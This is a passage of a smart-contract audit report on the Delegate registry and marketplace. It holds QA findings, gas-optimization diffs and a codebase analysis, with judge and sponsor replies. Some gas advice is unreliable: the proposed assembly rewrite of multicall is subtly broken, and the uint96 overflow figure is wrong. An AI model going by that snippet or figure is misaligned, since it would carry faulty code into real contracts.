An optimal Seaport app should return an order with penalties when its previewOrder function is called with unacceptable minimumReceived and maximumSpent arrays, so that the caller can learn what the Seaport app expects. But it should revert when its generateOrder is called with unacceptable minimumReceived and maximumSpent arrays, so the function fails fast, gets skipped, and avoids wasting gas by leaving the validation to Seaport.

function previewOrder(address caller, address, SpentItem[] calldata minimumReceived, SpentItem[] calldata maximumSpent, bytes calldata context)
    returns (SpentItem[] memory offer, ReceivedItem[] memory consideration)
    if (context.length != 160) revert Errors.InvalidContextLength();
    (offer, consideration) = Helpers.processSpentItems(minimumReceived, maximumSpent);

[02] Withdraw should revert with non-supported delegationType

There seems to be no way to create a DelegateToken that is not ERC721/ERC20/ERC1155, but due to the fact that DelegationType supports also ALL and CONTRACT:

enum DelegationType {

And there are multiple ways to create DelegateToken (e.g. DelegateToken.create and CreateOfferer.transferFrom, but more contracts could be created in the future), it would be safer to revert the transaction on withdraw to avoid burning unsupported tokens:

function withdraw(uint256 delegateTokenId) external nonReentrant {
    } else if (delegationType == IDelegateRegistry.DelegationType.ERC1155) {
        uint256 erc1155UnderlyingAmount = StorageHelpers.readUnderlyingAmount(delegateTokenInfo, delegateTokenId);
        StorageHelpers.writeUnderlyingAmount(delegateTokenInfo, delegateTokenId, 0); // Deletes amount
        uint256 erc11551UnderlyingTokenId = RegistryHelpers.loadTokenId(delegateRegistry, registryHash);
            delegateRegistry, registryHash, delegateTokenHolder, underlyingContract, erc11551UnderlyingTokenId, erc1155UnderlyingAmount, underlyingRights
        StorageHelpers.burnPrincipal(principalToken, principalBurnAuthorization, delegateTokenId);
        IERC1155(underlyingContract).safeTransferFrom(address(this), msg.sender, erc11551UnderlyingTokenId, erc1155UnderlyingAmount, "");
/* @audit Should revert here to avoid burning a not supported delegate token
    else {
        revert Errors.InvalidTokenType(delegationType);

[03] Lack of data on flashloan could make some ERC1155 unusable

When doing an ERC1155 flashloan, the data parameter is always empty:

IERC1155(info.tokenContract).safeTransferFrom(address(this), info.receiver, info.tokenId, info.amount, "");

Some collections might need this parameter to be usable. This is an example of such case:

  1. The sender transfers ERC1155 from the OpenSea contract to the ApeGang contract
  2. In the same transaction the ApeGang’s onERC1155BatchReceived hook is called
  3. This allows the ApeGang to react to the token being received
  4. The data includes merkle proofs that are needed to validate the transaction

Consider adding a flashloanData parameter to Structs.FlashInfo and pass it while transfering.

[04] Using delegatecall inside a loop may cause issues with payable functions

If one of the delegatecall consumes part of the msg.value, other calls might fail, if they expect the full msg.value. Consider using a different design, or fully document this decision to avoid potential issues.

function multicall(bytes[] calldata data) external payable override returns (bytes[] memory results) {
    results = new bytes[](data.length);
    bool success;
    unchecked {
        for (uint256 i = 0; i < data.length; ++i) {
            //slither-disable-next-line calls-loop,delegatecall-loop
            (success, results[i]) = address(this).delegatecall(data[i]);
            if (!success) revert MulticallFailed();

[05] CreateOfferer uses a custom context implementation instead of an existing SIP

It is suggested to use an existing SIP implementation instead of creating a new standard from scratch, which might be prone to errors:

Structs.Context memory decodedContext = abi.decode(context, (Structs.Context));

Please note that the contract needs to be SIP compliant before it’s possible to implement SIP-7, as it requires SIP-5 and SIP-6.

The issue describing non-compliance is described here: #280.

0xfoobar (Delegate) commented:

Useful QA report.

Alex the Entreprenerd (judge) commented:

[01] previewOrder should not revert

[02] Withdraw should revert with a not supported delegationType

[03] Lack of data on flashloan could make some ERC1155 unusable

[04] Using delegatecall inside a loop may cause issues with payable functions

[05] CreateOfferer uses a custom context implementation instead of an existing SIP

The following downgraded submissions from the warden were also considered in scoring:

Total: 6+ Low and 2 Refactoring

By far the best submission, great work!

0xfoobar (Delegate) acknowledged and commented:

[01] previewOrder should not revert
The quoted documentation actually says it can revert, we’re not doing order penalties here just straightforward fulfillment.

[02] Withdraw should revert with non-supported delegationType
It does.

[03] Lack of data on flashloan could make some ERC1155 unusable
Acknowledged, we won’t be transferring directly to staking contracts with merkle roots so this is fine.

[04] Using delegatecall inside a loop may cause issues with payable functions
But here it does not, we can see in the quoted code that it’s not looping over msg.value.

[05] CreateOfferer uses a custom context implementation instead of an existing SIP

Gas Optimizations

For this audit, 2 reports were submitted by wardens detailing gas optimizations. The report highlighted below by Sathish9098 received the top score from the judge.

The following warden also submitted a report: Baki.

[G-01] Structs can be packed into fewer storage slots

Saves 6000 GAS, 3 SLOT

Each slot saved can avoid an extra Gsset (20000 gas) for the first setting of the struct.

Subsequent reads as well as writes have smaller gas savings.

expiry can be uint96 instead of uint256 : Saves 2000 GAS, 1 SLOT

A uint96 can store values from 0 to 2^96 - 1, which is a very large range. However, it’s important to note that Ethereum’s block.timestamp is a Unix timestamp, which represents time in seconds.

A uint96 would overflow after approximately 2,508,149,904,626,209 years when storing time in seconds. This is an extremely long time frame, and it’s highly unlikely that Ethereum or any blockchain system will remain unchanged for such an extended period.

FILE: 2023-09-delegate/src/libraries/DelegateTokenLib.sol

20: struct DelegateInfo {
21:        address principalHolder;
22:        IDelegateRegistry.DelegationType tokenType;
23:        address delegateHolder;
24:        uint256 amount;
25:        address tokenContract;
+ 28:        uint96 expiry;
26:        uint256 tokenId;
27:        bytes32 rights;
- 28:        uint256 expiry;
29:    }

signerSalt, expiryLength can be uint128 instead of uint256 : Saves 4000 GAS, 2 SLOT

In many blockchain protocols, the usage of salt often involves values within the range of uint32, as they provide a sufficient numeric space for generating unique salts. Therefore, adopting a uint32 data type for the signerSalt field is a reasonable choice, as it aligns with common practices and conserves storage resources.

For the expiryLength field, which is intended to store the duration or length of an expiration period, using uint128 is more than adequate. This choice allows for a vast range of possible expiration lengths, accommodating a wide spectrum of use cases without incurring unnecessary storage overhead

FILE: 2023-09-delegate/src/libraries/CreateOffererLib.sol

89: struct Context {
90:        bytes32 rights;
+ 91:        uint128 signerSalt;
+ 92:        uint128 expiryLength;
- 91:        uint256 signerSalt;
- 92:        uint256 expiryLength;
93:        CreateOffererEnums.ExpiryType expiryType;
94:        CreateOffererEnums.TargetToken targetToken;
95:    }

98: struct Order {
99:        bytes32 rights;
- 100:        uint256 expiryLength;
- 101:        uint256 signerSalt;
+ 100:        uint128 expiryLength;
+ 101:        uint128 signerSalt;
102:        address tokenContract;
103:        CreateOffererEnums.ExpiryType expiryType;
104:        CreateOffererEnums.TargetToken targetToken;
105:    }

[G-02] Remove or replace unused state variables

Saves 20000 GAS

Saves a storage slot. If the variable is assigned a non-zero value, saves Gsset (20000 gas). If it’s assigned a zero value, saves Gsreset (2900 gas). If the variable remains unassigned, there is no gas savings unless the variable is public, in which case the compiler-generated non-payable getter deployment cost is saved. If the state variable is overriding an interface’s public function, mark the variable as constant or immutable so that it does not use a storage slot

FILE: delegate-registry/src/DelegateRegistry.sol

18: mapping(bytes32 delegationHash => bytes32[5] delegationStorage) internal delegations;

[G-03] State variables should be cached

Saves 300 GAS, 3 SLOD

Caching of a state variable replaces each Gwarmaccess (100 gas) with a cheaper stack read. Other less obvious fixes/optimizations include having local memory caches of state variable structs, or having local caches of state variable contracts/addresses.

nonce.value, receivers.targetTokenReceiver, receivers.fulfiller should be cached : Saves 300 GAS, 3 SLOD

FILE: 2023-09-delegate/src/libraries/CreateOffererLib.sol

+ uint256 value_ = nonce.value ;
- 185: if (nonce.value != contractNonce) revert CreateOffererErrors.InvalidContractNonce(nonce.value, contractNonce);
+ 185: if (value_ != contractNonce) revert CreateOffererErrors.InvalidContractNonce(value_, contractNonce);

+ address targetTokenReceiver_ = receivers.targetTokenReceiver ;
+ address fulfiller_ = receivers.fulfiller;
289: //slither-disable-start timestamp
300:        if (
                        tokenType: tokenType,
-                         principalHolder: decodedContext.targetToken == CreateOffererEnums.TargetToken.principal 
  ? receivers.targetTokenReceiver : receivers.fulfiller,
+                         principalHolder: decodedContext.targetToken == CreateOffererEnums.TargetToken.principal 
  ? targetTokenReceiver_  : fulfiller_ ,
-                        delegateHolder: decodedContext.targetToken == CreateOffererEnums.TargetToken.delegate ? receivers.targetTokenReceiver : receivers.fulfiller,
+                        delegateHolder: decodedContext.targetToken == CreateOffererEnums.TargetToken.delegate ? targetTokenReceiver_  : fulfiller_ ,
                        expiry: CreateOffererHelpers.calculateExpiry(decodedContext.expiryType, decodedContext.expiryLength),
                        rights: decodedContext.rights,
                        tokenContract: consideration.token,
                        tokenId: (tokenType != IDelegateRegistry.DelegationType.ERC20) ? consideration.identifier : 0,
                        amount: (tokenType != IDelegateRegistry.DelegationType.ERC721) ? consideration.amount : 0
            ) != keccak256(abi.encode(IDelegateToken(delegateToken).getDelegateInfo(DelegateTokenHelpers.delegateIdNoRevert(address(this), identifier))))
        ) revert CreateOffererErrors.DelegateInfoInvariant();

[G-04] Use assembly for loops to save gas

Saves 2450 GAS for every iteration from 7 instances

Assembly is more gas efficient for loops. Saves minimum 350 GAS per iteration as per remix gas checks.

FILE: Breadcrumbsdelegate-registry/src/DelegateRegistry.sol

- 35: for (uint256 i = 0; i < data.length; ++i) {
-                //slither-disable-next-line calls-loop,delegatecall-loop
-                (success, results[i]) = address(this).delegatecall(data[i]);
-                if (!success) revert MulticallFailed();
-            }

+ assembly {
+    // Load the length of the data array
+    let dataSize := mload(data)
+    // Initialize the results array
+    let results := mload(0x40)
+    mstore(results, dataSize)
+    // Initialize a counter (i) to zero
+    let i := 0
+    for { } lt(i, dataSize) { } {
+        // Start loop
+        // Load the next calldata from the data array
+        let calldataPtr := add(add(data, 0x20), mul(i, 0x20))
+        let calldataSize := mload(calldataPtr)
+        // Perform delegatecall
+        let success := delegatecall(gas(), address(), add(calldataPtr, 0x04), calldataSize, 0, 0)
+        // Store the result and check for success
+        if iszero(success) {
+            // Revert if delegatecall fails
+            revert(0, 0)
+        }
+        mstore(add(results, mul(i, 0x20)), success)
+        // Increment the counter
+        i := add(i, 1)
+        // End loop
+    }
+    // results contains the success status of each delegatecall
+ }

275:  for (uint256 i = 0; i < hashes.length; ++i) {

312: for (uint256 i = 0; i < length; ++i) {
                tempLocation = locations[i];
                assembly {
                    tempValue := sload(tempLocation)
                contents[i] = tempValue;

386: for (uint256 i = 0; i < hashesLength; ++i) {
                hash = hashes[i];
                if (_invalidFrom(_loadFrom(Hashes.location(hash)))) continue;
                filteredHashes[count++] = hash;

393:  for (uint256 i = 0; i < count; ++i) {
                hash = filteredHashes[i];
                location = Hashes.location(hash);
                (address from, address to, address contract_) = _loadDelegationAddresses(location);
                delegations_[i] = Delegation({
                    type_: Hashes.decodeType(hash),
                    to: to,
                    from: from,
                    rights: _loadDelegationBytes32(location, Storage.POSITIONS_RIGHTS),
                    amount: _loadDelegationUint(location, Storage.POSITIONS_AMOUNT),
                    contract_: contract_,
                    tokenId: _loadDelegationUint(location, Storage.POSITIONS_TOKEN_ID)

417: for (uint256 i = 0; i < hashesLength; ++i) {
                hash = hashes[i];
                if (_invalidFrom(_loadFrom(Hashes.location(hash)))) continue;
                filteredHashes[count++] = hash;

423: for (uint256 i = 0; i < count; ++i) {
                validHashes[i] = filteredHashes[i];

[G-05] Don’t initialize default values to variables to reduce gas

Saves 13 GAS for local variable and 2000 GAS for state variable

FILE: Breadcrumbsdelegate-registry/src/DelegateRegistry.sol

35: for (uint256 i = 0; i < data.length; ++i) {
275: for (uint256 i = 0; i < hashes.length; ++i) {
312: for (uint256 i = 0; i < length; ++i) {
386: for (uint256 i = 0; i < hashesLength; ++i) {
393: for (uint256 i = 0; i < count; ++i) {
417: for (uint256 i = 0; i < hashesLength; ++i) {
423: for (uint256 i = 0; i < count; ++i) {

[G-06] Use constants instead of type(uintX).max to avoid calculating every time

FILE: delegate-registry/src/DelegateRegistry.sol

213:    ? type(uint256).max
215: if (!Ops.or(rights == "", amount == type(uint256).max)) {
217: ? type(uint256).max
232: ? type(uint256).max
234: if (!Ops.or(rights == "", amount == type(uint256).max)) {
236: ? type(uint256).max
372: uint256 cleanUpper12Bytes = type(uint256).max << 160;

[G-07] For same condition checks use modifiers

File: delegate-registry/src/DelegateRegistry.sol

56: } else if (loadedFrom == msg.sender) {
75: } else if (loadedFrom == msg.sender) {
85: } else if (loadedFrom == msg.sender) {
115:  } else if (loadedFrom == msg.sender) {
118: } else if (loadedFrom == msg.sender) {
140: } else if (loadedFrom == msg.sender) {
143: } else if (loadedFrom == msg.sender) {

[G-08] Declare the variables outside the loop

Per iterations saves 26 GAS

FILE: delegate-registry/src/DelegateRegistry.sol

+                 bytes32 location ;
+                 address from ;
 for (uint256 i = 0; i < hashes.length; ++i) {
-                 bytes32 location = Hashes.location(hashes[i]);
-                 address from = _loadFrom(location);
+                location = Hashes.location(hashes[i]);
+                from = _loadFrom(location);
                if (_invalidFrom(from)) {
                    delegations_[i] = Delegation({type_: DelegationType.NONE, to: address(0), from: address(0), rights: "", amount: 0, contract_: address(0), tokenId: 0});
                } else {
                    (, address to, address contract_) = _loadDelegationAddresses(location);
                    delegations_[i] = Delegation({
                        type_: Hashes.decodeType(hashes[i]),
                        to: to,
                        from: from,
                        rights: _loadDelegationBytes32(location, Storage.POSITIONS_RIGHTS),
                        amount: _loadDelegationUint(location, Storage.POSITIONS_AMOUNT),
                        contract_: contract_,
                        tokenId: _loadDelegationUint(location, Storage.POSITIONS_TOKEN_ID)

Alex the Entreprenerd (judge) commented:

Very good work with the first 2 findings!

0xfoobar (Delegate) confirmed and commented:

Useful findings on the gas stuff. Not sure the refactoring is worth the loss of struct ordering here but will think it over.

Audit Analysis

For this audit, 4 analysis reports were submitted by wardens. An analysis report examines the codebase as a whole, providing observations and advice on such topics as architecture, mechanism, or approach. The report highlighted below by pfapostol received the top score from the judge.

The following wardens also submitted reports: DadeKuma, m4ttm, and Banditx0x.

Approach taken in evaluating the codebase

I first explored the scope of audit. I discovered that the project can be divided into 2 independent parts: Delegate Registry and Delegate Marketplace. I carried out all subsequent stages separately for each of this parts, and then analyzed the correctness of their interaction.

Test coverage

Delegate Registry:

Test coverage is 100% for most audit files. In this regard, I decided to concentrate on finding logical errors, since simple errors (errors due to typos, incorrect statements) should be excluded by tests.

File % Lines % Statements % Branches % Funcs
src/DelegateRegistry.sol 100.00% (175/175) 100.00% (219/219) 98.78% (81/82) 100.00% (33/33)
src/libraries/RegistryHashes.sol 100.00% (12/12) 100.00% (12/12) 100.00% (0/0) 100.00% (12/12)
src/libraries/RegistryOps.sol 66.67% (2/3) 66.67% (2/3) 100.00% (0/0) 66.67% (2/3)
src/libraries/RegistryStorage.sol 100.00% (6/6) 100.00% (6/6) 100.00% (0/0) 100.00% (3/3)

Delegate Marketplace:

File % Lines % Statements % Branches % Funcs
src/CreateOfferer.sol 90.70% (39/43) 92.00% (46/50) 77.27% (17/22) 100.00% (8/8)
src/DelegateToken.sol 88.55% (147/166) 90.28% (195/216) 80.43% (37/46) 89.66% (26/29)
src/PrincipalToken.sol 100.00% (14/14) 100.00% (17/17) 100.00% (4/4) 100.00% (5/5)
src/libraries/CreateOffererLib.sol 95.24% (40/42) 95.38% (62/65) 69.23% (18/26) 100.00% (9/9)
src/libraries/DelegateTokenLib.sol 88.89% (8/9) 90.48% (19/21) 75.00% (6/8) 100.00% (5/5)
src/libraries/DelegateTokenRegistryHelpers.sol 100.00% (57/57) 100.00% (87/87) 100.00% (26/26) 100.00% (21/21)
src/libraries/DelegateTokenStorageHelpers.sol 91.67% (44/48) 92.11% (70/76) 80.77% (21/26) 100.00% (21/21)
src/libraries/DelegateTokenTransferHelpers.sol 88.24% (30/34) 87.80% (36/41) 80.77% (21/26) 100.00% (9/9)

Code review

I studied the Delegate Registry code starting with the libraries, and also starting from the lowest level functions, moving to the top level functions. Having built a general understanding of what each of the functions does, I formed an idea of how the Registry works and built general diagrams.

Packed delegation data:


Important external interfaces:

  1. delegateAll - Delegates the entire wallet
  2. delegateContract - Delegates the right to use the contract
  3. delegateERC721 - Delegates the right to use a specific contract token
  4. delegateERC20 - Delegates the right to use a certain amount of a token of a certain contract
  5. delegateERC1155 - Delegates the right to use a certain amount of a certain token of a certain contract

There are also 5 functions to check the correctness of the delegation

Details on each function and hashing schemes `RegistryOps` library:
  1. Contains 3 operation:

    1. max: use optimized assembly logic to calculate max of 2 numbers
    2. and: use 2x iszero to clean arguments before and
    3. or: use 2x iszero to clean arguments before or

RegistryStorage library:

  1. Contains 10 constants:

    1. mostly offsets for packing/unpacking of addresses
  2. Contains 3 functions:

    1. packAddresses: - store from, to and contract addresses in 2 storage slots
    2. unpackAddresses: - reverse to packAddresses operation
    3. unpackAddress: - helper to unpack to or from. Should not to be used for contract unwrapping

RegistryHashes library:

  1. Contains 7 constants:

    1. mostly types of hashes
  2. Contains 12 functions:

    1. decodeType: - decode hash type from last byte into enum, (potentially may overflow enum)
    2. location: - calculate storage key from hash


    3. allHash: - calculate hash for all type


    4. allLocation: - calculate location for all type hash


    5. contractHash : - similar to allHash
    6. contractLocation: - similar to allLocation
    7. erc721Hash: - similar to allHash
    8. erc721Location: - similar to allLocation
    9. erc20Hash: - similar to allHash
    10. erc20Location: - similar to allLocation
    11. erc1155Hash: - similar to allHash
    12. erc1155Location: - similar to allLocation

DelegateRegistry contract:

  1. contains 3 state variables:

    1. delegations
    2. outgoingDelegationHashes
    3. incomingDelegationHashes
  2. contains 33 functions:

    1. sweep: - transfer all contract balance to hardcoded address (Currently 0x0)
    2. readSlot: - perform sload
    3. readSlots: - perform sloads in loop
    4. _pushDelegationHashes: - push delegation hash to the incoming and outgoing hashes mappings
    5. _writeDelegation x2 : - perform sstore for data at position in location
    6. _updateFrom: - change from value in first slot, while keeping first 8 bytes of contract intact
    7. _loadDelegationBytes32: - perform sload at position in location
    8. _loadDelegationUint: - similar to _loadDelegationBytes32
    9. multicall: - payable multicall
    10. supportsInterface: -
    11. _writeDelegationAddresses: - sstore packed delegation at 0 and 1 slot in location
    12. _loadFrom: - sload from address from location
    13. _loadDelegationAddresses: - reverse to _writeDelegationAddresses
    14. _invalidFrom: - check if address is DELEGATION_EMPTY or DELEGATION_REVOKED flags(addresses)
    15. _validateFrom: - match passed from to value in location
    16. checkDelegateForAll: - validate that from delegated to the entire wallet
    17. checkDelegateForContract: - the same as checkDelegateForContract or delegated for specific contract
    18. checkDelegateForERC721 : - the same as checkDelegateForContract or delegated for specific tokenId in specific contract
    19. checkDelegateForERC20: - return amount delegated from to to
    20. checkDelegateForERC1155 : - similar to checkDelegateForERC20
    21. _getValidDelegationHashesFromHashes: - remove invalid froms from hashes array
    22. getIncomingDelegationHashes: - return only valid hashes from incomingDelegationHashes
    23. getOutgoingDelegationHashes: - the same as getIncomingDelegationHashes, but with outgoingDelegationHashes
    24. _getValidDelegationsFromHashes: - read storage for every valid hash in memory Delegation struct
    25. getIncomingDelegations: - return Delegation struct for only valid hashes from incomingDelegationHashes
    26. getOutgoingDelegations: - the same as getIncomingDelegations, but with outgoingDelegationHashes
    27. getDelegationsFromHashes: - the same as _getValidDelegationsFromHashes but for invalid delegation return empty struct
    28. delegateAll: - msg.sender delegate the whole wallet to from


    29. delegateContract: - similar to delegateAll, but for specific contract
    30. delegateERC721: - similar to delegateContract, but for specific tokenId
    31. delegateERC20: - similar to delegateContract, but for ERC20 token amount + allow to change amount if already delegated
    32. delegateERC1155: - similar to delegateERC20, but for ERC1155 (specific tokenId)

Delegate Marketplace:

CreateOfferer is a separate part of the marketplace that guarantees interaction with the seaport.

Important external interfaces:

  1. create - Create DelegateToken and PrincipalToken tokens. Transfer one of token types to contract. Delegate to `delegateHolder. mint principal token.
  2. extend - Extend the expiration time for an existing DelegateToken. Called by PrincipalToken owner.
  3. rescind - Return the DelegateToken to the PrincipalToken holder early. Called by DelegateToken holder or after the DelegateToken has expired, anyone can call this method. this does not release the spot asset from escrow, it merely cancels out the DelegateToken.
  4. withdraw - burn the PrincipalToken and claim the spot asset from escrow. Called by the PrincipalToken owner. PrincipalToken owner can authorize others to call this on their behalf, and if PrincipalToken owner also owns the DelegateToken then they can skip calling rescind and go straight to withdraw
Details for each function ### Delegate marketplace

DelegateTokenStorageHelpers library:

  1. Contains 10 constants:

    1. mostly flags and storage positions
  2. Contains 21 functions:

    1. writeApproved: - store approved to `PACKEDINFOPOSITIONwhile keepingexpiry` intact
    2. writeExpiry: - store expiry to `PACKEDINFOPOSITIONwhile keepingapproved` intact
    3. writeRegistryHash: - store registryHash to REGISTRY_HASH_POSITION
    4. writeUnderlyingAmount: - store underlyingAmount to UNDERLYING_AMOUNT_POSITION
    5. incrementBalance: - increment balance for delegateTokenHolder
    6. decrementBalance: - decrement balance for delegateTokenHolder
    7. principalIsCaller: - revert if msg.sender is not principalToken
    8. revertAlreadyExisted: - revert if registryHash is not zero
    9. revertNotOperator: - revert if not operator or “owner”
    10. readApproved: - shift PACKED_INFO_POSITION to read approved
    11. readExpiry: - read expiry from PACKED_INFO_POSITION
    12. readRegistryHash: - read registryHash from REGISTRY_HASH_POSITION
    13. readUnderlyingAmount: - read underlyingAmount from UNDERLYING_AMOUNT_POSITION
    14. revertNotMinted: - revert if registryHash is not set or used (ID_AVAILABLE, ID_USED)
    15. checkBurnAuthorized: - revert if caller is not principalToken or delegate not authorized burn
    16. checkMintAuthorized: - similar to checkBurnAuthorized but with mint
    17. revertNotApprovedOrOperator: - revert if caller is not “owner” or operator or approved in token
    18. revertInvalidWithdrawalConditions: - similar to revertNotApprovedOrOperator + check expiry
    19. burnPrincipal : - call burn on PrincipalToken with custom reentrancy guard
    20. mintPrincipal: - call mint on PrincipalToken with custom reentrancy guard

DelegateTokenRegistryHelpers library:

  1. Contains 21 functions:

    1. loadTokenHolder: - read to from delegateRegistry at location from registryHash. Not revert on revoked!!!
    2. loadContract: - read contract from delegateRegistry at location from registryHash
    3. loadTokenHolderAndContract: - read to and contract from delegateRegistry at location from registryHash
    4. loadFrom: - similar with from
    5. loadAmount: - similar with amount
    6. loadRights: - similar with rights
    7. loadTokenId: - similar with tokenId
    8. calculateDecreasedAmount: - return amount - decreaseAmount. No underflow check!!!
    9. calculateIncreasedAmount: - similar to calculateDecreasedAmount ,but increased
    10. transferERC721: - revoke delegation to from and delegate to while validating both hashes
    11. revokeERC721: - revoke delegation and validate hash
    12. delegateERC721: - delegate and validate hash
    13. revertERC721FlashUnavailable: - revert if contract does not have rights for flashloan or tokenId itself
    14. revertERC20FlashAmountUnavailable: - revert if delegation does not have enough amount with “” and flashloan rights
    15. revertERC1155FlashAmountUnavailable: - similar to revertERC20FlashAmountUnavailable
    16. transferERC20: - decrease amount from old delegation and increase for new
    17. transferERC1155: - similar to transferERC20
    18. incrementERC20: - increase amount in delegation
    19. incrementERC1155: - the same with ERC1155
    20. decrementERC20: - similar to incrementERC20, but decrease
    21. decrementERC1155: - similar to incrementERC1155, but decrease

DelegateTokenTransferHelpers library:

  1. Contains 2 constants:

    1. ERC1155 callbacks
  2. Contains 9 functions:

    1. checkERC1155BeforePull : - custom reentrancy guard + revert if amount == 0
    2. checkERC1155Pulled:- bottom part of custom reentrancy guard + require contract to be operator
    3. revertInvalidERC1155PullCheck: - revert on checkERC1155Pulled condition
    4. pullERC1155AfterCheck: - transfer ERC1155 from msg.sender to contract revert if ERC1155_PULLED
    5. checkERC20BeforePull: - check that it is ERC20 check that amount ≠ 0, check that there is enough allowance
    6. pullERC20AfterCheck: - transfer ERC20 from msg.sender to contract
    7. checkERC721BeforePull: - check that it is ERC721, check that owner is msg.sender
    8. pullERC721AfterCheck: - transfer ERC721 from msg.sender to contract
    9. checkAndPullByType: - transfer one of token types from msg.sender to contract

DelegateTokenHelpers library:

  1. Contains 5 functions:

    1. revertOnCallingInvalidFlashloan: - revert if selector does not match
    2. revertOnInvalidERC721ReceiverCallback: - the same
    3. revertOnInvalidERC721ReceiverCallback: - the same
    4. revertOldExpiry: - revert if expiry expired
    5. delegateIdNoRevert: - hash caller and salt

DelegateToken contract:

  1. Contains 29 functions:

    1. supportsInterface: - supported interfaces
    2. onERC1155BatchReceived: - revert
    3. onERC721Received: - revert if contract is not operator, else return selector
    4. onERC1155Received: - revert on custom reentrancy check fail else return selector
    5. balanceOf: - get balance of delegateTokenHolder if not address(0)
    6. ownerOf: - return to from registry for specific delegateTokenId
    7. getApproved: - return approved address revert if not minted
    8. isApprovedForAll: - return if accountOperator
    9. approve: - store approved spender, revert if not minted or not operator
    10. setApprovalForAll: - set accountOperator
    11. name: - constant
    12. symbol: - constant
    13. transferFrom: - transfer delegateTokenId with underlying token
    14. isApprovedOrOwner: - check if it is “owner"or operator or approved
    15. getDelegateId: - get delegateTokenId revert if not available
    16. burnAuthorizedCallback: - revert if caller is not principalToken or delegate not authorized burn
    17. mintAuthorizedCallback: - similar
    18. create: - transfer one of token types to contract. delegate to delegateHolder. mint principal token
    19. safeTransferFrom: - call transferFrom and check selector callback
    20. getDelegateInfo: - build and get DelegateInfo from delegateTokenId
    21. extend: - allow principal or operator to increase expiry if old not expired
    22. rescind: - allow delegate( or anyone after expiry) transfer delegateTokenId to principal
    23. tokenURI: - call MarketMetadata for delegateTokenURI
    24. baseURI: - call MarketMetadata for delegateTokenBaseURI
    25. contractURI: - call MarketMetadata for delegateTokenContractURI
    26. royaltyInfo: - similar
    27. withdraw: - withdraw delegation, burn principal, transfer underlaying back to msg.sender
    28. flashloan: - flash-loan operation for all token types

PrincipalToken contract:

  1. Contains 5 functions:

    1. isApprovedOrOwner : - Call ERC721 _isApprovedOrOwner
    2. _checkDelegateTokenCaller: - check caller is delegateToken
    3. tokenURI: - Call MarketMetadata for principalTokenURI
    4. mint: - mint. Called by delegateToken when authorized
    5. burn: - burn. Called by delegateToken when authorized

CreateOffererModifiers library:

  1. store seaport address and Stage
  2. Contains 2 modifiers:

    1. onlySeaport: - caller is seaport
    2. checkStage: - reentrancy check + stage change

CreateOffererHelpers library:

  1. Contains 9 functions:

    1. processNonce: - check nonce and increment if correct
    2. updateTransientState: - fulfill TransientState struct
    3. createAndValidateDelegateTokenId: - Call create on IDelegateToken. And check correct delegateId
    4. calculateExpiry: - return absolute expiry for both types
    5. processSpentItems: - build offer and consideration from minimumReceived and maximumSpent
    6. calculateOrderHash: - hash order with with tokenType
    7. calculateOrderHashAndId: - get delegateTokenId from calculateOrderHash
    8. verifyCreate: - match hash to context
    9. validateCreateOrderHash: - match provided hash to actual

CreateOfferer contract:

  1. Seaport iteraction

Mechanism review

The contract consists of 2 parts, one part is a storage of delegation hashes, and the other part is ERC721 compatible tokens that reflect the ownership of the delegation.

Delegate Registry: uses hashing to compactly store the delegation. And also hash functions for calculating a unique location in storage. It also contains functions that check the hash based on the location and from address.

Delegate Token: Deposits all assets, in return issues an ERC721 token, which confirms the ownership of the delegation, for a certain period of time.

PrincipalToken: Depends on Delegate Token, cannot be called on its own. It is an ERC721 token that confirms the right to claim deposited assets after expiration.

CreateOfferer: Integration with seaport as specified in documentation. When selling, the asset turns into a Delegate Token and is assigned to the buyer, the seller receives a PrincipalToken.

Delegate Token in its work relies entirely on Delegate Registry, which must reliably guarantee the authenticity and confirmation of the delegation.

Codebase quality analysis

In general, the quality of the code base is quite high. The huge number of comments in NatSpec makes it very easy to determine what a particular function is intended for.

The downside is the use of assembler for gas optimization, which is not comparable to the damage it causes to code readability.

Centralization risks

There is no risk of centralization since all rights are divided between the Delegate Token and the PrincipalToken. The only exception is CreateOfferer, which relies on the seaport address, which is immutable, but it is possible that the contract address will change in the future, it would be useful to add a function that allows you to change the address if necessary

Systemic risks

The contract is used to delegate all types of tokens (ERC20, ERC721, ERC1155), but does not take into account that some tokens do not follow the standards.

Contracts are programmed for version ^0.8.21, by default the compiler will use version 0.8.21, which is very recent and may contain undetected vulnerabilities, as well as compatibility problems with different L2 chains.

New insights and learning from this audit

I learned about CreateOfferer seaport integration, all other concepts were well known to me.

Time spent
33 hours

Alex the Entreprenerd (judge) commented:

Imo proper way to discuss coverage
Interesting charts for packing and logic on delegation


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C4 Audits incentivize the discovery of exploits, vulnerabilities, and bugs in smart contracts. Security researchers are rewarded at an increasing rate for finding higher-risk issues. Audit submissions are judged by a knowledgeable security researcher and solidity developer and disclosed to sponsoring developers. C4 does not conduct formal verification regarding the provided code but instead provides final verification.

C4 does not provide any guarantee or warranty regarding the security of this project. All smart contract software should be used at the sole risk and responsibility of users.